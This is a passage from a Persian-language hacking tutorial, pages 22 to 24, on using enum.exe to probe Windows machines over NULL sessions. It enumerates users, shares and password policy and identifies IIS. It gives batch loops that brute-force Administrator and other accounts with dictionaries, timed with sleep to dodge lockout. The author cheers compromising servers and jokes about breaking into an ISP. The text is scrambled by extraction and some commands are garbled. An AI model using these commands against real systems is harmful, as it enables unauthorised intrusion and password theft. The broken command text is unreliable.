C++‬اﺱﺖ‪ .‬اﻟﺒﺘﻪ ایﻦ را ﺏﮕﻮیﻢ ﮐﻪ ﺏﺮای ﻧﻔﻮذ ﺏﺎ ایﻦ اﺏﺰار ﺏﺎی ﺪ ﭘ ﻮرت ‪ ١٣٩‬ﺏ ﺎز ﺏﺎﺷ ﺪ اﻟﺒﺘ ﻪ ﻓﻘ ﻂ ﺏ ﺮای ﻧﻔ ﻮذ ﺏﺎی ﺪ ای ﻦ‬ ‫ﭘﻮرت ﺏﺎز ﺏﺎﺷﺪ‪.‬ﮔﺰیﻨﻪ هﺎی ایﻦ ﻧﺮم اﻓﺰار ﺏﺴﻴﺎر اﺱﺖ ﮐﻪ اﻟﺒﺘﻪ ﻣﻦ ﻣﺜﻞ روال ﻣﻘﺎﻟﻪ هﻤﻪ ﺁﻧﻬﺎ را ﺕﻮﺽﻴﺢ ﻧﻤﯽ دهﻢ !!‬ ‫ﻗﺎﺏﻠﻴﺘﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺴﻴﺎر زیﺎد اﺱﺖ ﻣﺜﻼ وﻗﺘﯽ از ﺷﻤﺎ ﺱﻴﺴﺘﻤﯽ ﮐﻠﻤﻪ ﻋﺒﻮر و ﻧﺎم ﮐﺎرﺏﺮ ﻣﻴﺨﻮاهﺪ و ﮐﺎر دیﮕﻪ ان ﺟﻤﻊ ﺁوری اﻃﻼﻋ ﺎت از ﺱﻴ ﺴﺘﻢ‬ ‫هﺪف اﺱﺖ ﮐﻪ ﻣﻦ ﻓﻌﻼ دﻧﺒﺎل ایﻦ هﺴﺘﻢ ﻧﻪ ﭼﻴﺰ دیﮕﻪ ایﯽ اﻟﺒﺘﻪ اوﻟﯽ را هﻢ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ‪ .‬وﻗﺘ ﯽ در ﺧ ﻂ ﻓﺮﻣ ﺎن اﺟ ﺮا ﻣﻴﮑﻨﻴ ﺪ ﺏﺮﻧﺎﻣ ﻪ را ای ﻦ ه ﺎ را‬ ‫ﻣﯽ ﺏﻴﻨﻴﺪ‪:‬‬ ‫‪C :\> enum.exc‬‬ ‫‪Usage: enum.exe‬‬ ‫]‪[switches‬‬ ‫]‪[hostname │ip‬‬ ‫‪-U: get user list‬‬ ‫‪-M: get machine list‬‬ ‫)‪-N: get name list dump (different from -U │-M‬‬ ‫‪-S: get share list‬‬ ‫‪-P: get password policy information‬‬ ‫‪-G: get group and member list‬‬ ‫‪-L: get LSA policy information‬‬ ‫‪-D: dictionary crack, needs -u and -f‬‬ ‫‪-d: he detailed, applies to -U and -s‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٢‬‬

‫‪-c: don’t cancel sessions‬‬ ‫) "" ‪-U: specify username to use (default‬‬ ‫) "" ‪-p: specify password to use (default‬‬ ‫)‪-f: specify dictfile to use (wants D‬‬

‫ﮐﻪ ایﻦ دﻓﻌﻪ ﺱﻌﯽ ﻣﯽ ﮐﻨﻢ ﺏﺮ ﺧﻼف روال ﻣﻘﺎﻟﻪ یﮏ ﮐﻤﯽ ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﺏﺪهﻢ ‪.‬هﻮرا !!!!‬ ‫هﻔ ﺖ ) ‪ ( ٧‬ﮔﺰیﻨ ﻪ اول " ﺕﻮﺟ ﻪ ﮐﻨﻴ ﺪ " ﺏ ﺎ ﻓ ﺮض ای ﻦ ﮐ ﻪ ﻣﻨﺒ ﻊ ﻣ ﺸﺘﺮک ‪ IPC$‬از ﻃﺮی ﻖ ﭘ ﻮرت ‪ ١٣٩‬و ی ﺎ ‪ ۴۴۵‬ﻗﺎﺏ ﻞ دﺱ ﺖ ی ﺎﺏﯽ اﺱ ﺖ اﻧﺒ ﻮهﯽ‬ ‫اﻃﻼﻋﺎت را درﺏﺎرﻩ ﺱﻴﺴﺘﻢ هﺪف ﺏﺮای ﻣﺎ ﺟﻤﻊ ﺁوری ﻣﯽ ﮐﻨﺪ ‪ ).‬اﻟﺒﺘﻪ اﺕﺼﺎل ﻣﺎ ﺏﺎ ﻗﺮﺏﺎﻧﯽ هﻢ در ایﻦ ﺏﺮﻧﺎﻣﻪ و ﺏﺮﻧﺎﻣﻪ ﻗﺒﻠﯽ از ﻧ ﻮع ‪ NULL‬یﻌﻨ ﯽ‬ ‫ﻧﺎﺷﻨﺎس اﺱﺖ (‪.‬اﺟﺮای ایﻦ ‪ ٧‬ﮔﺰیﻨﻪ ﺏﺎ هﻢ اﻣﮑﺎن ﭘﺬیﺮ اﺱﺖ وﻟﯽ ﺁﻧﻘﺪر ﺏﻪ ﻣﺎ ﺟﻮاب ﻣﻴﺪهﺪ ﮐﻪ ﮔﻴﺞ ﻣﻴﺸﻮیﻢ ‪.‬‬ ‫‪C:\ enum.exe UMNSPGLD 192.168.0.3‬‬ ‫هﻤﺎﻧﻄﻮر ﮐﻪ ﮔﻔﺘﻢ ایﻦ دﺱﺘﻮر درﺱﺖ اﺱﺖ وﻟﯽ ﺟﻮاﺏﻬﺎ زیﺎد و ﺕﺠﺰیﻪ ﺕﺤﻠﻴﻞ ﺁن ﻣ ﺸﮑﻞ اﺱ ﺖ ﻣ ﻦ ﻋﻤ ﻼ از ای ﻦ ﺕﺮﮐﻴﺒ ﺎت ﮐ ﻪ ﻣﻴﮕ ﻮیﻢ اﺱ ﺘﻔﺎدﻩ ﻣﻴﮑ ﻨﻢ‬ ‫‪.‬ﻣﺜﻼ ﻣﻦ ﺕﺮﮐﻴﺒﯽ از ﺱﻮیﭻ هﺎی ‪ UPG‬را اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ ﻣﺜﻞ‪:‬‬ ‫‪C :\> enum UPG xxx.xxx.xxx.xxx‬‬ ‫‪Server: xxx.xxx.xxx.xxx‬‬ ‫‪Password policy:‬‬ ‫‪min length: none‬‬ ‫‪min age: none‬‬ ‫‪max age: 42 days‬‬ ‫‪lockout threshold: none‬‬ ‫‪lockout duration: 30 mins‬‬ ‫‪lockout reset: 30 mins‬‬ ‫‪getting user list (pass 1, index 0) . . . success, got 5.‬‬ ‫‪Administrator Guest IUSR_ALPHA IWAN ALPHA‬‬ ‫‪Tslternet User‬‬ ‫‪Group: Administrators‬‬ ‫‪ALPHA \ Administrator‬‬ ‫‪Group: Guests‬‬ ‫‪ALPHA \ Guest‬‬ ‫‪ALPHA \ Ts Internet User‬‬ ‫‪ALPHA \ IUSR_ALPHA‬‬ ‫‪ALPHA \ IWAM_ ALPHA‬‬ ‫‪Group: Power Users‬‬

‫هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ ﺏﻪ واﺱﻄﻪ وﺟﺪ ﺧﻄﻮط زرد ﭘﯽ ﺏﻪ ایﻦ ﻣﻮﺽﻮع ﻣﯽ ﺏﺮیﻢ ﮐﻪ ایﻦ ﻣﺎﺷﻴﻦ هﻠﻮ اﺱﺖ ‪.‬واﺽﺢ اﺱﺖ ﮐﻪ هﻴﭻ ﻣﺤﺪودیﺘﯽ در ﺏﺮاﺏ ﺮ‬ ‫ﺡﺪس زدن ﻧﺎدرﺱﺖ ﮐﻠﻤ ﻪ ﺕﻮﺱ ﻂ ﻣﻬ ﺎﺟﻢ وﺟ ﺪ ﻧ ﺪارد و ﺏ ﺎ وﺟ ﺪ ﻧ ﺸﺎﻧﻪ ه ﺎی ) ‪ IUSR_ALPHA‬و ‪ ( IWAN ALPHA‬ﻣ ﺎ ﭘ ﯽ ﻣﻴﺒ ﺮیﻢ ﮐ ﻪ ﻧ ﺮم اﻓ ﺰار‬ ‫ﺱﺮویﺲ دهﻨﺪﻩ وب ) ‪ (WEB‬اﺡﺘﻤﺎل ﻗﺮیﺐ ﺏﻪ یﻘﻴﻦ ‪ IIS‬در ﭘﻴﺖ ﻣﺎیﮑﺮوﺱﺎﻓﺖ اﺱﺖ )هﻮرا ﺱﺎیﺖ هﮏ ﺷﺪ دیﮕﻪ (!!!!‬ ‫و ﻧﺸﺎﻧﻪ ‪ Tslternet User‬ﺧﺒﺮ از ﻓﻌﺎﻟﻴﺖ ﺱﺮویﺲ ‪ Terminal Services‬را ﺏﻪ ﻣﺎ ﻣﯽ دهﺪ‪.‬‬ ‫اﺟﺎزﻩ دهﻴﺪ یﮏ ﺕﺮﮐﻴﺐ هﺎی ﺱﻮیﭻ دیﮕﺮی را هﻢ ﺏﮕﻮیﻢ ‪ .‬ﻣﯽ ﻧﻮیﺴﻴﻢ ‪:‬‬ ‫‪C :\> enum.exe MNS xxx.xxx.xxx.xxx‬‬ ‫‪Server: xxx.xxx.xxx.xxx‬‬ ‫‪Setting up session … success.‬‬ ‫‪Getting namelist (pass 1) … got 5, 0 left:‬‬ ‫‪Administrator Guest IUSR_ALPHA IWAM_ALPHA‬‬ ‫‪TsInternetUser‬‬ ‫‪Enumerating shares (pass 1) … got 3 shares , 0 left:‬‬ ‫‪IPC$ ADMIN$ C$‬‬ ‫‪GETTING MACHINE LIST (PASS 1 , INDEX 0) … SUCCESS , GOT 0.‬‬ ‫‪CLEANING UP … SUCCESS.‬‬ ‫هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ ﻋﻼوﻩ ﺏﺮ ﻧﻤﺎیﺶ ﻟﻴﺴﺖ ﮐﺎرﺏﺮان ﻣﻮﺟﻮد ﻣﻨﺎﺏﻊ ﻣﺸﺘﺮک ﻣﻮرد اﺱ ﺘﻔﺎدﻩ را ﻧﻴ ﺰ ﺁﺷ ﮑﺎر ﺷ ﺪﻩ اﺱ ﺖ‪ .‬اﻟﺒﺘ ﻪ ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ اﻃﻼﻋ ﺎت‬ ‫ﺏﺎﻻ ﻣﻴﺘﻮان ﺡﺪس ﻗﺮیﺐ ﺏﻪ یﻘﻴﻦ زد ﮐﻪ ﺱﻴﺴﺘﻢ ﻣﻮرد ﻧﻈﺮ ﻓﻘﻂ دارای یﮏ درایﻮ هﺎرد اﺱﺖ ﮐﻪ در ﺧﺮوﺟﯽ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرت ‪ C$‬ﻧﻤﺎیﺶ دادﻩ ﺷﺪﻩ‬ ‫اﺱ ﺖ ‪.‬ﺏ ﺎ ﺕﻮﺟ ﻪ ﺏ ﻪ ای ﻦ اﻃﻼﻋ ﺎت ) ﻣ ﯽ داﻧ ﻴﻢ ‪ IIS‬ه ﻢ دارد ( ﻣ ﯽ ﺕ ﻮان ای ﻦ ﺟ ﻮری ﻧﺘﻴﺠ ﻪ ﮔﺮﻓ ﺖ ﮐ ﻪ " ری ﺸﻪ ﺱ ﻨﺪ وب " ی ﺎ اﺻ ﻄﻼﺡﺎ ‪Web‬‬ ‫‪ document root‬ﻧﻴﺰ ﺏﺮ روی هﻤﻴﻦ درایﻮ و در ﻣﻮﻗﻌﻴﺖ ‪ C:\Winnt\temSys32‬ﻗﺮار دارد ‪ .‬ایﻦ ﺕﺮﮐﻴﺒﯽ ﮐﻪ ﺏﻪ ﺷ ﻤﺎ ی ﺎد دادم ﺕﺮﮐﻴ ﺐ اﺱﺎﺱ ﯽ‬ ‫ﻋﻠﻴﻪ ﺱﺮویﺲ دهﻨﺪﻩ وب ﻣﺨﺼﻮﺻﺎ ‪ IIS‬در ﭘﻴﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ داﺷﺘﻦ ﺏ ﯽ ﻧﻬﺎی ﺖ ﺏ ﺎگ و اﮐ ﺴﭙﻠﻮیﺖ اﺱ ﺖ‪ .‬ﮔﺰیﻨ ﻪ ‪ –L‬در ای ﻦ ﺏﺮﻧﺎﻣ ﻪ اﻃﻼﻋ ﺎﺕﯽ در‬ ‫ﻣﻮرد ﺧﻂ ﻣﺸﯽ اﺡﺮاز هﻮیﺖ در ﺱﻴﺴﺘﻢ ﻣﺤﻠﯽ ) ‪ Local Security Authority‬و یﺎ ‪ ( LSA‬در اﺧﺘﻴﺎر ﻣﺎ ﻗﺮار ﻣﻴﺪهﺪ ‪.‬‬ ‫ﺧﻮب ﻣﻤﮑﻦ اﺱﺖ اﻏﻠﺐ ﺏﺎ ﻣﻮارد ﺧﺎﺻﯽ روﺏﻪ رو ﺷﻮیﺪ ﮐﻪ ﺡﺴﺎب ﻣﺪیﺮ ) ‪ ( SID=500‬ﻓﺎﻗﺪ رﻣﺰ ﻋﺒﻮر ﺏﺎﺷﺪ !!!‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٣‬‬

‫ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از دو ﮔﺰیﻨﻪ ‪ –u‬و ‪ –p‬ﻣﯽ ﺕﻮان اﻃﻼﻋﺎت ﻣﺮﺏﻮط ﺏﻪ ﺷﻨﺎﺱﺎیﯽ یﮏ ﮐﺎرﺏﺮ ﺏﻪ ﺧﺼﻮص را ﻣﻮرد ﺏﺮﺱﯽ ﻗﺮار داد‪.‬‬ ‫‪C:\>enum.exe –UMNSPGL –u administrator –p " " xxx.xxx.xxx.xxx‬‬ ‫زﻧﮓ ﺕﻔﺮﻳﺢ !!!‬ ‫ایﻦ ﺏﺮای ﭘﻮﻟﺪار هﺎ ﻣﻴﮕﻮیﻢ ﮐﻪ رﻓﺘﻦ ‪ ISP‬زدن و ‪ ١٠‬ﺕﺎ ﺡﺴﺎب ﻣﺪیﺮ روی ﺱﺮور ﺏﺮای ﺕﻤ ﺎم ﺧﺎﻧ ﺪان ﺧ ﻮد ﺏ ﺎز ﮐ ﺮدن ‪.‬ﺡﺘﻤ ﺎ ﺕ ﺎ ﺏ ﻪ ﺡ ﺎل ای ﻦ ﻣ ﯽ‬ ‫داﻧﺴﺘﻴﺪ ﮐﻪ ﺡﺴﺎب ﻣﺪیﺮ )‪ ( administrator‬هﺮﮔ ﺰ ﺏ ﻪ واﺱ ﻄﻪ ﺕ ﻼش ﻧ ﺎﻣﻮﻓﻖ ) وارد ﮐ ﺮدن ه ﺰاران ﺏ ﺎر ﮐﻠﻤ ﻪ ﻋﺒ ﻮر ﻧﺎدرﺱ ﺖ( ﻗﻔ ﻞ ﻧﻤ ﯽ ﺷ ﻮد و‬ ‫هﻤﻴﻦ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﻧﻔﻮذ ﮔﺮهﺎ وﺱﻮﺱﻪ ﺏﺸﻮﻧﺪ ﺕﺎ ﺷﺎﻧﺲ ﺧﻮد را اﻣﺘﺤﺎن ﮐﻨﻨﺪ ﺏﺮای ﮐﺸﻒ ﮐﻠﻤﻪ ﻋﺒﻮر ﻣﺪیﺮ‪ .‬ﺏ ﺮای رﻓ ﻊ ای ﻦ ﻋﻴ ﺐ ی ﮏ ﻧ ﺮم اﻓ ﺰاری‬ ‫هﺴﺖ در ﺏﺴﺘﻪ ﻧﺮم اﻓﺰاری ‪ Windows Resource Kit‬ﺏ ﻪ ﻧ ﺎم ‪ Passport/administrator‬ﮐ ﻪ ﺕ ﺎ ﺡ ﺪودی ای ﻦ ﻋﻴ ﺐ را ﺏﺮﻃ ﺮف ﮐ ﺮدﻩ دیﮕ ﻪ‬ ‫ﺏﻘﻴﻪ ﮐﺎر ﺏﺎ ﺧﻮدﺕﺎن ‪.‬‬ ‫ﺏﺮای ﮐﺸﻒ ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﺎ ایﻦ ﻧﺮم اﻓﺰار ﮐﻪ اﻟﺒﺘﻪ ﮐﻨﺪ ) ﺱﺮﻋﺖ ﮐﻢ !!( هﻢ هﺴﺖ در ایﻦ ﻣﻮرد از ﻓﺮﻣﺎن زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ﺏﻪ ایﻦ ﺻﻮرت ‪:‬‬ ‫‪C:\>enum.exe –D –u Administrator –f dict.txt‬‬ ‫ﮐﻪ ﺷﻤﺎ ﻣﻴﺘﻮاﻧﻴ ﺪ ﺏ ﻪ ﺟ ﺎی ﻧ ﺎم ﮐ ﺎرﺏﺮ ‪ administrator‬ه ﺮ ﻧ ﺎم ﮐ ﺎرﺏﺮ دیﮕ ﺮی را ﻣ ﻮرد اﺱ ﺘﻔﺎدﻩ ﻗ ﺮار دهﻴ ﺪ و ﺏ ﻪ ﺟ ﺎی ‪ dict.doc‬ه ﻢ ﺁدرس ) در‬ ‫ﺻﻮرت ایﻨﮑﻪ ایﻦ ﻓﺎیﻞ در هﻤﺎن ﭘﻮﺷﻪ ﻧﺒﺎﺷﺪ ( و ﻧﺎم ﻓﺮهﻨﮓ ﻟﻐﺖ ) دیﮑﺸﻨﺮی ( ﺡﻤﻠﻪ ﺧﻮد را وارد ﮐﻨﻴﺪ ‪.‬‬ ‫ﺧﻮب ایﻦ ﺏﺮای ﺡﺴﺎب هﺎی ﻣﺪیﺮ اﺱﺖ ﮐﻪ هﻴﭻ ﻣﺤﺪودیﺖ زﻣﺎﻧﯽ و ﻃﻮل ﮐﻠﻤﻪ ﻧﺪارد اﺱﺖ‪ .‬اﻣﺎ اﮔﺮ ﺱﻴﺎﺱﺖ هﺎی اﻣﻨﻴﺘﯽ ﺏﻪ ﮔﻮﻧﻪ ای ﺏﻮد ﮐﻪ ﻣﺜﻼ ﺏﺎ‬ ‫ﺕﻌﺪاد ﭼﻨﺪ ﺏﺎر وارد ﮐﺮدن اﺷﺘﺒﺎﻩ ﮐﻠﻤﻪ ﻋﺒﻮر ﺡﺴﺎب ﻗﻔﻞ ﻣﯽ ﺷﻮد ﺏﻪ ﻣﺪت زﻣﺎن ﻣﺸﺨﺼﯽ ﻣ ﺎ ﺏﺎی ﺪ ﭼ ﻪ ﮐﻨ ﻴﻢ ؟ ﺧ ﻮب ﺏﻌ ﻀﯽ ه ﺎ ﻓﮑ ﺮ ﻣ ﯽ ﮐﻨﻨ ﺪ ﮐ ﺎر‬ ‫دیﮕﺮ ﻣﺤﺎل اﺱﺖ اﻣﺎ ﻣﻦ ﺏﺎ روﺷﯽ ﮐﻪ یﺎدﺕﺎن ﻣﯽ دهﻢ ﻣﺪت ایﻦ ﮐﺎر ﺧﻴﻠﯽ زیﺎد ﻣﻴﺸﻮد وﻟﯽ ‪ %١٠٠‬اﻣﮑﺎن ﭘﺬیﺮ اﺱﺖ ‪.‬‬ ‫ﺧﻮب ﺏﺎ یﮏ ﻣﺜﺎل ﺁﻣﻮزش ﻣﻴﺪهﻢ ‪ .‬اول ﺱﻴﺎﺱﺘﻬﺎی ﮐﻠﻤﻪ ﻋﺒﻮر را ﺏﺎ ﺱ ﻮیﭻ ‪ –p‬ﺏﺪﺱ ﺖ ﻣ ﯽ ﺁوری ﺪ ﮐ ﻪ ﺏ ﺎ اﻃﻼﻋ ﺎﺕﯽ ﮐ ﻪ داری ﺪ ﻣ ﯽ ﻓﻬﻤﻴ ﺪ ﮐ ﻪ ﻣ ﺜﻼ‬ ‫ﺏﻮاﺱﻄﻪ وارد ﮐﺮدن ‪ ۵‬ﺏﺎر ﮐﻠﻤﻪ ﻋﺒﻮر اﺷﺘﺒﺎﻩ ﺡﺴﺎب ﺏ ﺮای ‪ ٣٠‬دﻗﻴﻘ ﻪ ﻗﻔ ﻞ ﻣ ﯽ ﺷ ﻮد ) در ای ﻦ ﻣ ﺪت ﺡﺘ ﯽ ﺏ ﺎ وارد ﮐ ﺮدن ﮐﻠﻤ ﻪ درﺱ ﺖ ه ﻢ ﺏ ﻪ ﺷ ﻤﺎ‬ ‫اﻣﮑﺎن ورود ﺏﻪ ﺡﺴﺎب هﻢ دادﻩ ﻧﻤﯽ ﺷﻮد و یﺎ ﺡﺘﯽ در ایﻦ ﻣﺪت اﺻﻼ ﻧﻤﯽ ﺷﻮد ﺏﻪ ﺁن ﮐﻠﻤﻪ ﻋﺒﻮر داد ( ﺏﺮای ایﻦ ﮐﺎر از دﺱﺘﻮر زی ﺮ اﺱ ﺘﻔﺎدﻩ ﻣ ﯽ‬ ‫ﮐﻨﻴﻢ ) ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺕﺎﺏﻊ ﺕﺎﺧﻴﺮ ‪: ( Sleep‬‬ ‫‪C :\>For /F %%p in (dict.exe) do enum.exe u Istari p %% p M xxx.xxx.xxx.xxx >> output.txt && sleep‬‬ ‫‪180s‬‬ ‫ﺧﻮب یﮏ ﺱﻮیﭻ ‪ –G‬اﺱﺖ ﮐﻪ ﺏﻪ راﺡﺘﯽ ﻣﯽ ﺕﻮاﻧﻴﺪ ﺡﺴﺎب هﺎی هﻢ ﮔﺮوﻩ را ﮐﺸﻒ ﮐﻨﻴﺪ ﻣﺜﻼ ﺕﻤﺎم ﻧﺎم ﮐﺎرﺏﺮ هﺎ ﺏﺎ ﻣﺠﻮز ﺡﺴﺎب ﻣﺪیﺮ و‪...‬‬ ‫ایﻦ ﮔﻔﺘﻢ ﺕﺎ ﺕﺠﺮﺏﻪ اﺱﺎﺱﯽ ﺧﻮدم را در اﺧﺘﻴﺎر ﺷﻤﺎ هﺎ ﺏﮕﺰارم ‪ .‬یﮏ ﻧﮑﺘﻪ ) ایﻦ ﻣﺜﺎل ﮐﻠﯽ و در ﺏﻘﻴﻪ ﻣﻮارد ه ﻢ ﮐ ﺎرایﯽ دارد " دوﮔﻮﻟ ﻪ " را روﺷ ﻦ‬ ‫ﮐﻨﻴﺪ( اﮔﺮ ﺷﻤﺎ ﺕﻤﺎم ﻧﺎم ﮐﺎرﺏﺮ هﺎ ﺏﺎ ﻣﺠﻮز ﻣﺜﻼ ‪ limit‬را ﺏﺪاﻧﻴﺪ اﺡﺘﻤﺎل ﭘﻴﺪا ﮐﺮدن ﮐﻠﻤﻪ ﻋﺒﻮر ﺏﺮای ﺡﺪاﻗﻞ یﮑﯽ از ﻧﺎﻣﻬﺎی ﮐﺎرﺏﺮ ﺏﺮای ﺷﻤﺎ ﺏﻴ ﺸﺘﺮ‬ ‫اﺱﺖ) ﭼﺮای ایﻦ ﻗﻀﻴﻪ را ﺧﻮدﺕﺎن ﺏﻔﻬﻤﻴﺪ !! ( ﺏﺮای اﺱﺘﻔﺎدﻩ از ایﻦ ﻧﮑﺘﻪ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻣﺴﺎﺋﻞ ﺏﺎﻻ از ﻓﺮﻣﺎن زیﺮ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻴﻢ ‪:‬‬ ‫‪u‬‬

‫‪C:\> for /F %%p in ( dict.txt ) do for /F %%u in (users.txt) do enum.exe %% u in (usres.txt) do enum.exe‬‬ ‫‪%%u p %%p M xxx.xxx.xxx.xxx >> output.txt‬‬

‫ایﻦ روش هﻨﮕﺎﻣﯽ ﺏﻪ اوج ﺱﻮﭘﺮ ﺧﻔﻨﯽ ﻣﻴﺮﺱﺪ ﮐﻪ ﻓﺎیﻞ ﺡﺎوی ﮐﻠﻤﺎت ﻋﺒﻮر ﮐﻮﭼﮏ ) ﺕﻌﺪاد ﮐﻤﺘﺮی ﮐﻠﻤﻪ( و ﻓﺎیﻞ ﺡﺎوی ﻧﺎم ﮐﺎرﺏﺮان ﺏﺰرگ ﺏﺎﺷﺪ‪.‬‬ ‫ﺧﻮب اﻻن ﮐﻪ داﺷﺘﻢ دوﺏﺎرﻩ ایﻦ ﻣﺒﺤﺚ ﻣﻴﺨﻮاﻧﺪم دیﺪم ﺏﺮﺧﻼف رویﻪ ایﻦ ﻣﻘﺎﻟﻪ ﺕﻤﺎم ﻧﮑﺎت و ﺕﺠﺮﺏﻪ هﺎی ﺧﻮدم را ﻧﻴﺰ رو ﮐﺮدﻩ ام اﻣﺎ اﺷ ﮑﺎل ﻧ ﺪارد‬ ‫ﺏﻌﻀﯽ هﺎ را هﻢ ﻣﻦ از ایﻦ ﺁن یﺎد ﮔﺮﻓﺘﻢ و از اول ﮐﻪ زایﻴﺪﻩ ﺷﺪم هﮑﺮ ﮐﻪ ﻧﺒﻮدم !! یﮏ ﺱﺮی هﺎ را ﺧﻮدم ﮐﺸﻒ ﮐﺮدم ﺏﻴﺸﺘﺮ ﺁن را ه ﻢ دیﮕ ﺮان ‪،‬‬ ‫ﭘﺲ ﺏﮕﺰار ﻣﻦ ﺏﻪ دیﮕﺮان هﺮ ﭼﯽ ﺏﻠﺪ هﺴﺘﻢ یﺎد ﺏﺪم ‪.‬‬ ‫ﺟﻌﺒﻪ اﺏﺰار ‪: Pstools‬‬ ‫ﺧﻮب اﺏﺰار ﺏﻌﺪی ﮐﻪ ﻣﻴﺨﻮاهﻢ یﺎد ﺏﺪهﻢ ﺟﻌﺒﻪ اﺏﺰار ‪ Pstools‬اﺱﺖ ﮐﻪ ﺧﻼ ﻣﻮﺟﻮد ﺏﻴﻦ دﺱﺘﻴﺎﺏﯽ ﺏﻪ اﻃﻼﻋﺎت ﮐﺎرﺏﺮان ﺱﻴﺴﺘﻢ و دﺱﺘﺮﺱ ﯽ ﮐﺎﻣ ﻞ ﺏ ﻪ‬ ‫ﺧﻮد ﺱﻴﺴﺘﻢ را ﭘﺮ ﻣﻴﮑﻨﺪ ‪.‬ایﻦ ﻣﺠﻤﻮﻋﻪ ﺏﻪ هﻤﺖ ﺁﻗﺎی ‪ Mark Russinovich‬ﺕﻮﺱﻌﻪ یﺎﻓﺘﻪ و از ایﻨﺠﺎ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﮕﺮیﺪ‪.‬ایﻦ ﺟﻌﺒﻪ اﺏ ﺰار ی ﮏ ﮐﻮﭼﻮﻟ ﻮ‬ ‫ﻣﺸﮑﻞ دارد و ﺁن هﻢ ایﻦ اﺱﺖ ﮐﻪ ﭼﻮن اﺱﺎس ﺏﺮ ﺟﻤﻊ ﺁوری ﺡﺪاﮐﺜﺮ اﻃﻼﻋﺎت ﻣﻤﮑﻦ ﮔﺬاﺷﺘﻪ ﺷ ﺪﻩ ﺏ ﺮ ﺧ ﻼف دو اﺏ ﺰاری ﮐ ﻪ ﺏ ﺎﻻ ﺕﻮﺽ ﻴﺢ دادم از‬ ‫اﺕﺼﺎل ﻧﺎﺷﻨﺎس ) ‪ ( NULL‬اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﺪ و یﮏ ﮐﻤﯽ رد دﺱﺖ ﻧﻤﻴﺪوﻧﻢ ﺷﺎیﺪ ﭘﺎ هﻢ ﺏﮕﺬارد‪.‬‬ ‫ﺏﺮای ایﻦ ﮐﻪ ایﻦ ﻣﺠﻤﻮﻋﻪ درﺱﺖ ﮐﺎر ﮐﻨﺪ و ﻣﺎ ﻧﺘﻴﺠﻪ ﺡﺪاﮐﺜﺮی ﺏﮕﻴﺮیﻢ ﺏﺎیﺪ ﺡﺪاﻗﻞ ﭼﻨﺪ ﺷﺮط زیﺮ ﻧﺼﻔﻪ ﻧﻴﻤﻪ ﺏﺮﻗﺮار ﺏﺎﺷﺪ‬ ‫• ﻻزم اﺱﺖ ﺏﻪ اﻃﻼﻋﺎت ﮐﺎرﺏﺮان دﺱﺖ رﺱﯽ داﺷﺘﻪ ﺏﺎﺷﻴﻢ‪.‬‬ ‫• ﻻزم اﺱﺖ یﮏ ﺱﺮویﺴﯽ ﺏﻪ ﻧﺎم ‪ Server‬روی ﺁن ﻣﺎﺷﻴﻦ راﻩ ﺏﯽ اﻧﺪازیﻢ‪.‬ﺏﺪ ﻧﻴﺴﺖ ﺱﺮویﺲ ‪ Net Logon‬هﻢ ﺏﺎﺷﺪ‪.‬‬ ‫• ﺏﺪ ﻧﻴﺴﺖ ﺏﻪ ‪ Registry‬دﺱﺖ رﺱﯽ از راﻩ دور داﺷﺘﻪ ﺏﺎﺷﻴﻢ‪.‬‬ ‫• ﻣﻨﺒﻊ ﻣﺸﺘﺮک ‪ IPC$‬ﺏﺎیﺪ در دﺱﺘﺮس ﺏﺎﺷﺪ‪.‬‬ ‫ایﻦ ﺟﻌﺒﻪ اﺏﺰار ‪ ١٠‬ﺏﺮﻧﺎﻣﻪ هﻠﻮ دارد ﮐﻪ ﺏﻪ واﻗﻊ ﻓﺮایﻨﺪ ﻣﺪیﺮیﺖ ﺱﻴ ﺴﺘﻢ را ﺏ ﻪ ﻟﺤﻈ ﺎت ﺷ ﻴﺮیﻨﯽ ﺕﺒ ﺪیﻞ ﻣﻴﮑﻨ ﺪ‪.‬از ﻗﺎﺏﻠﻴﺘﻬ ﺎی ای ﻦ ﻣﺠﻤﻮﻋ ﻪ ﻣﻴﺘ ﻮان ﺏ ﻪ‬ ‫دﺱﺘﺮﺱﯽ ﺏﻪ ﭼﻨﺪیﻦ ﻣﺎﺷﻴﻦ در ﺁن واﺡﺪ و اﺟﺮای دﺱﺘﻮر هﺎ روی ﺁﻧﻬﺎ و‪) ...‬ﺧﻴﻠﯽ زیﺎد اﻣﮑﺎﻧﺎت ﺁن و‪( ...‬‬ ‫اﺏﺰار اول ‪: PsFile‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٤‬‬

